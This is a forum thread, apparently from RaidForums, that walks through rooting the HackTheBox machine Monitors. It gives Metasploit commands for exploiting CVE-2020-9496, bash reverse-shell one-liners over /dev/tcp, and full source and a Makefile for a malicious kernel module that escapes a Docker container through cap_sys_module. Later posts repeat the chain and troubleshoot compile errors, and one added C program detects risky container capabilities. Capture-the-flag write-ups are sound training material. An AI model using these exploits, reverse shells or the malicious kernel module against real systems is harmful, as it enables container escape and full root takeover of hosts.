TUTORIAL Monitors: root part for free
by siracuso - April 26, 2021 at 12:47 PM
#1
Hi, I'm back to share how to root the Monitors HTB machine step by step. Ready?

It is assumed that you already have the SSH password for user marcus. If not, check my user write-up at https://raidforums.com/Thread-Tutorial-M...t-for-free

We'll need to map some ports to the internal docker container through ssh:
ssh -L 8443:127.0.0.1:8443 -R 4444:127.0.0.1:4444 -R 8080:127.0.0.1:8080 [email protected]

You can check what is on port 8443 once mapped by entering the URL https://127.0.0.1:8443/ in a browser. It is Tomcat 9.0.31, which is vulnerable to CVE-2020-9496. We'll use Metasploit:

msfconsole
use linux/http/apache_ofbiz_deserialization
set rhosts 127.0.0.1
set lhost 10.10.x.x
set forceexploit true
run

A meterpreter session is now open. Interact with it in Metasploit and type "shell" to get a simple shell inside the container. Now let's see how to escape. I followed this tutorial: https://blog.pentesteracademy.com/abusin...5c29956edd

The steps are easy to follow. Anyway, the explanation is that docker containers share the kernel with the host, and from this docker container the ability to install kernel modules is enabled, so we can create an evil kernel module to get a root shell on the host. Here it is summarized:

1. Create on your local Linux a file called reverse-shell.c with this content (note that the IP and port are changed from the tutorial; we'll use the remote host machine's IP):

#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
/* Command the kernel will spawn as root in the host's namespaces: a bash reverse
   shell to 172.17.0.1 (the docker0 bridge address, i.e. the host) on port 4443 */
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/172.17.0.1/4443 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
/* Runs when the module is loaded with insmod: asks the kernel to run the command above */
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
/* Runs when the module is removed with rmmod */
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);

2. Create on your local Linux a file called Makefile with this content:
# the two recipe lines below must begin with a tab character, not spaces
obj-m += reverse-shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

3. We need to compile it on the remote container, so we have to upload it. First, create a simple Python web server using:
python3 -m http.server 80

4. Now from the remote container shell, launch these commands (setting your IP) to download the needed files into the remote container (don't worry about curl warnings):
cd /tmp
curl -L http://10.10.x.x/reverse-shell.c -o /tmp/reverse-shell.c
curl -L http://10.10.x.x/Makefile -o /tmp/Makefile

5. Let's compile there using the "make" command. A new file called reverse-shell.ko will appear.

6. Set up a netcat listener on the port you put in the reverse-shell.c file. The listener must be on the remote Ubuntu host machine, in the marcus SSH session shell:

nc -lnvp 4443

7. Install the evil kernel module on the remote container. It will trigger the shell we'll receive on the listener on the remote host machine, and the root flag can now be obtained as usual:

insmod reverse-shell.ko

Enjoy! And feel free to give some reputation if you liked the tutorial :)
Reply
#2
You only need -L for the port forward, not -R.
Reply
#3
The Metasploit shell is not stable!
It's giving me an error!
Reply
#4
Got a meterpreter session but getting an error whenever trying to use the shell.

meterpreter > shell
[-] Unknown command: shell.
Reply
#5
I can't get a shell.
Errors:
ssh : channel 3: open failed: connect failed: Connection refused
msf : [-] Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer - SSL_connect
Reply
#6
(April 26, 2021 at 04:25 PM)wizardhulk Wrote: Got a meterpreter session but getting an error whenever trying to use the shell.

meterpreter > shell
[-] Unknown command: shell.
meterpreter is unstable, use a simple revshell:

use linux/http/apache_ofbiz_deserialization
set rhosts 127.0.0.1
set lhost tun1
set lport 8444
set forceexploit true
set payload linux/x64/shell/reverse_tcp
run

and afterwards upgrade it with python:
python -c 'import pty; pty.spawn("/bin/bash")'
Reply
#7
Again facing a problem with the make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
CC [M] /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#
Reply
#8
Road to root
It seems I cannot run sudo on the box,
but we have a note.txt worth looking at:

```text
TODO:

Disable phpinfo in php.ini - DONE
Update docker image for production use -
```
So we have a docker image that we can misuse.
I had run the linpeas script earlier and noticed something:
```text
cat www/linpeas.out | grep docker
/usr/bin/docker
root 1879 0.0 0.1 110132 5152 ? Sl Apr24 0:04 _ containerd-shim -namespace moby -workdir /var/lib/containerd/io.containerd.runtime.v1.linux/moby/8832c151081f51190d464c193a08645810e3e71b31c75c8dee7cd221bc97323a -address /run/containerd/containerd.sock -containerd-binary /usr/bin/containerd -runtime-root /var/run/docker/runtime-runc
root 1383 0.0 2.0 902200 83388 ? Ssl Apr24 0:23 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 1870 0.0 0.1 480780 4024 ? Sl Apr24 0:00 _ /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 8443 -container-ip 172.17.0.2 -container-port 8443
-rwxr-xr-x 1 root root 3743536 Sep 16 2020 /usr/bin/docker-proxy
-rwxr-xr-x 1 root root 102075464 Sep 16 2020 /usr/bin/dockerd
[ + ] docker
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
172.17.0.0 0.0.0.0 255.255.0.0 U 0 0 0 docker0
[+] Searching docker files
[i] https://book.hacktricks.xyz/linux-unix/p...ker-socket
srw-rw---- 1 root docker 0 Apr 24 21:03 /run/docker.sock
```
The user root runs a docker proxy on port 8443, which we can reverse tunnel using ssh to investigate the docker container.
We use this command in a new terminal:
```bash
ssh -L 8443:127.0.0.1:8443 -R 9001:127.0.0.1:9001 -R 8000:127.0.0.1:8000 [email protected]
```
We enter the password and check whether our ports are open:
```text
tcp 0 0 127.0.0.1:8443 0.0.0.0:* LISTEN
tcp6 0 0 ::1:8443 :::* LISTEN
```
We see it worked. Now for the investigation.

# Port 8443
Navigating to https://127.0.0.1:8443, we find a 404 page (after accepting the SSL certificate), but we find something else:
it is running Apache Tomcat 9.0.31, which is an older version. Looking for CVEs that relate to docker containers,

we find a recent one which turns out to be a rabbit hole.
I asked around and found it was subject to CVE-2020-9496.
Here is an awesome article explaining it: https://www.zerodayinitiative.com/blog/2...usted-data

Let's see if we have an exploit.
I find a certain Metasploit module:
an Apache deserialization that allows us to force our way into a docker container.

So let's see if I can use it:
```text
msf6 exploit(multi/handler) > use exploit/linux/http/apache_ofbiz_deserialization
[*] Using configured payload linux/x64/meterpreter_reverse_https
msf6 exploit(linux/http/apache_ofbiz_deserialization) >
```
It appears to work after a few settings (target 0, not 1):
```text
set rhosts 127.0.0.1
set lport <any>
set target 0
run
```
The shell is really unstable; if you don't get a shell, try again until you
get one which is blank. You should see something like this:
```text
[*] Command shell session 6 opened (10.10.14.221:9001 -> 10.129.104.212:49136) at 2021-04-26 19:41:15 +0300
```
Set a nc listener on any port,
then slap your bash shell onto the nc listener:
```bash
/bin/bash -c "bash -i >& /dev/tcp/10.10.14.*/<port> 0>&1"
```
We get a shell!
```text
[email protected]:/usr/src/apache-ofbiz-17.12.01#
```
It looks as if we are in a docker container.
Let's escape out of it.

Escaping the docker container
Found a nice website on escaping the container: https://blog.pentesteracademy.com/abusin...5c29956edd

Following the steps:

1: Let's see if we can find its vulnerability:
```text
[email protected]:/# capsh --print
capsh --print
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+eip
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_module,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=
```

We have the sys_module capability, so we can do it.
As a result, the container can insert/remove kernel modules in/from the kernel of the Docker host machine.

2: Find the IP address.
Don't worry, we can get it by using the victim machine's IP:
```bash
ip a
```
IP: the machine IP

3: Build the exploit.
reverse-shell.c:
```c
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/MACHINE-IP/4443 0>&1", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
static int __init reverse_shell_init(void) {
return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}
static void __exit reverse_shell_exit(void) {
printk(KERN_INFO "Exiting\n");
}
module_init(reverse_shell_init);
module_exit(reverse_shell_exit);
```
4: Creating a Makefile (recipe lines indented with a tab):
```makefile
obj-m += reverse-shell.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
```
5: Moving the files to the container and making them.
Start a python3 http server in the same folder as the exploit and the Makefile and move them to the container's tmp folder.
Make a directory called temp and cd into it.
When you are done, go to the SSH connection and listen using netcat on port 4443.
Now run the make command:
```bash
make
```
We get some new files:
```text
ls
Makefile
Module.symvers
modules.order
reverse-shell.c
reverse-shell.ko
reverse-shell.mod.c
reverse-shell.mod.o
reverse-shell.o
```
We run the .ko file:
```bash
insmod reverse-shell.ko
```
We get root in our netcat:
```text
[email protected]:/
```
Reply
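The check both writeups rely on (post #1's "the ability to install kernel modules is enabled", post #8's capsh --print output showing cap_sys_module) can be made without capsh by decoding the capability bitmask the kernel exposes in /proc/<pid>/status. The program below is an added example, not code from this thread or from the linked blog post. It parses the CapEff line, reports whether CAP_SYS_MODULE (bit 16) and a few other host-reaching capabilities are present, and on Linux also asks the kernel directly through prctl(PR_CAPBSET_READ). The sample_status text is constructed: 0xa80425fb is the mask of Docker's default capability set, and 0xa80525fb is that set plus bit 16, which is exactly the list shown by capsh in post #8.

```c
/* Added example (not from the thread): decode the raw capability bitmask that
 * capsh --print prints by name, and flag the capabilities that let a container
 * reach the host kernel. Reads the calling process's /proc/self/status on Linux
 * and falls back to the constructed sample below elsewhere. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef __linux__
#include <sys/prctl.h>
#endif

/* Capability numbers, as in <linux/capability.h>; defined here so the file
 * also builds where the kernel UAPI headers are not installed. */
#ifndef CAP_SYS_MODULE
#define CAP_DAC_READ_SEARCH 2
#define CAP_SYS_MODULE      16
#define CAP_SYS_RAWIO       17
#define CAP_SYS_PTRACE      19
#define CAP_SYS_ADMIN       21
#endif

/* Pull the hex bitmask that follows a "CapXxx:" key out of status-file text.
 * Returns 1 and stores the mask in *out, or 0 if the key is absent/malformed. */
int parse_cap_mask(const char *status_text, const char *key, unsigned long long *out)
{
    size_t klen = strlen(key);
    const char *line = status_text;
    while (line && *line) {
        if (strncmp(line, key, klen) == 0) {
            const char *p = line + klen;
            while (*p == ' ' || *p == '\t') p++;
            char *end;
            unsigned long long v = strtoull(p, &end, 16);
            if (end == p) return 0;            /* key present, no number after it */
            *out = v;
            return 1;
        }
        line = strchr(line, '\n');             /* advance to the next line */
        if (line) line++;
    }
    return 0;
}

/* Bit <cap> of the mask is the capability with that number. */
int has_cap(unsigned long long mask, int cap)
{
    if (cap < 0 || cap > 63) return 0;
    return (int)((mask >> cap) & 1ULL);
}

/* CapEff mask of a status text, or 0 when the line is missing. */
unsigned long long capeff_of(const char *status_text)
{
    unsigned long long m = 0;
    return parse_cap_mask(status_text, "CapEff:", &m) ? m : 0;
}

/* Capabilities that on their own let a container break out to the host.
 * CAP_SYS_MODULE is the one this thread uses (insmod of a malicious .ko). */
static const struct { int cap; const char *name; } escape_caps[] = {
    { CAP_SYS_MODULE,      "cap_sys_module" },
    { CAP_SYS_ADMIN,       "cap_sys_admin" },
    { CAP_SYS_PTRACE,      "cap_sys_ptrace" },
    { CAP_SYS_RAWIO,       "cap_sys_rawio" },
    { CAP_DAC_READ_SEARCH, "cap_dac_read_search" },
};

/* Count the escape-relevant capabilities in mask; if buf is given, write their
 * names into it, space separated. Returns the count. */
int escape_caps_in(unsigned long long mask, char *buf, size_t buflen)
{
    int n = 0;
    if (buf && buflen) buf[0] = '\0';
    for (size_t i = 0; i < sizeof escape_caps / sizeof escape_caps[0]; i++) {
        if (!has_cap(mask, escape_caps[i].cap)) continue;
        n++;
        if (buf && buflen) {
            size_t used = strlen(buf);
            snprintf(buf + used, buflen - used, "%s%s", used ? " " : "", escape_caps[i].name);
        }
    }
    return n;
}

/* Constructed sample of what /proc/self/status shows in the thread's container:
 * Docker's default set 0xa80425fb plus bit 16 (CAP_SYS_MODULE) = 0xa80525fb. */
const char *sample_status =
    "Name:\tbash\n"
    "Uid:\t0\t0\t0\t0\n"
    "CapInh:\t0000000000000000\n"
    "CapPrm:\t00000000a80525fb\n"
    "CapEff:\t00000000a80525fb\n"
    "CapBnd:\t00000000a80525fb\n";

int main(void)
{
    char text[8192] = {0};
    const char *src = sample_status;
    FILE *f = fopen("/proc/self/status", "r");
    if (f) {
        size_t n = fread(text, 1, sizeof text - 1, f);
        fclose(f);
        if (n > 0) src = text;                 /* real process on Linux */
    }
    unsigned long long eff;
    if (!parse_cap_mask(src, "CapEff:", &eff)) {
        fprintf(stderr, "no CapEff line found\n");
        return 1;
    }
    char names[256];
    int n = escape_caps_in(eff, names, sizeof names);
    printf("CapEff = %016llx, escape-relevant caps: %d%s%s\n", eff, n, n ? " -> " : "", names);
#ifdef PR_CAPBSET_READ
    /* Ask the kernel rather than the text file: 1 = in bounding set, 0 = not. */
    printf("CAP_SYS_MODULE in bounding set (prctl): %d\n",
           (int)prctl(PR_CAPBSET_READ, CAP_SYS_MODULE, 0, 0, 0));
#endif
    return 0;
}
```

Run it from the container shell (or from any process) to see the same answer capsh gives; a count of 0 against Docker's default set is the expected outcome for a properly run container, and the fix on the host side is to start the container without the extra grant (no --cap-add SYS_MODULE, or an explicit --cap-drop SYS_MODULE), since a module loaded from the container runs in the shared host kernel regardless of namespaces.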
#9
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing a problem with the make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

Same problem bro. Did you find any solution???
Reply
#10
(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing a problem with the make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

Same problem bro. Did you find any solution???

Take a look at the blog post given and copy the spaces along with it. It helped me to have the "             " in the file.
Reply
#11
(April 26, 2021 at 07:36 PM)Bumper Wrote:
(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing a problem with the make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

Same problem bro. Did you find any solution???

Take a look at the blog post given and copy the spaces along with it. It helped me to have the "             " in the file.


If you could tell me exactly where I should look, that would be great.

(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing a problem with the make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

Same problem bro. Did you find any solution???


Any luck?
Reply
#12
(April 26, 2021 at 07:53 PM)wizardhulk Wrote:
(April 26, 2021 at 07:36 PM)Bumper Wrote:
(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing a problem with the make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

Same problem bro. Did you find any solution???

Take a look at the blog post given and copy the spaces along with it. It helped me to have the "             " in the file.


If you could tell me exactly where I should look, that would be great.

(April 26, 2021 at 07:33 PM)patelcha Wrote:
(April 26, 2021 at 06:37 PM)wizardhulk Wrote: Again facing a problem with the make command


[email protected]:/tmp# make
make
make -C /lib/modules/4.15.0-142-generic/build M=/tmp modules
make[1]: Entering directory '/usr/src/linux-headers-4.15.0-142-generic'
  CC [M]  /tmp/reverse-shell.o
gcc: error trying to exec 'cc1': execvp: No such file or directory
make[2]: *** [scripts/Makefile.build:339: /tmp/reverse-shell.o] Error 1
make[1]: *** [Makefile:1584: _module_/tmp] Error 2
make[1]: Leaving directory '/usr/src/linux-headers-4.15.0-142-generic'
make: *** [Makefile:3: all] Error 2
[email protected]:/tmp#

Same problem bro. Did you find any solution???


Any luck?

Nope, I have tried the space thing but got the same issue:

obj-m +=reverse-shell.o
all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
Reply
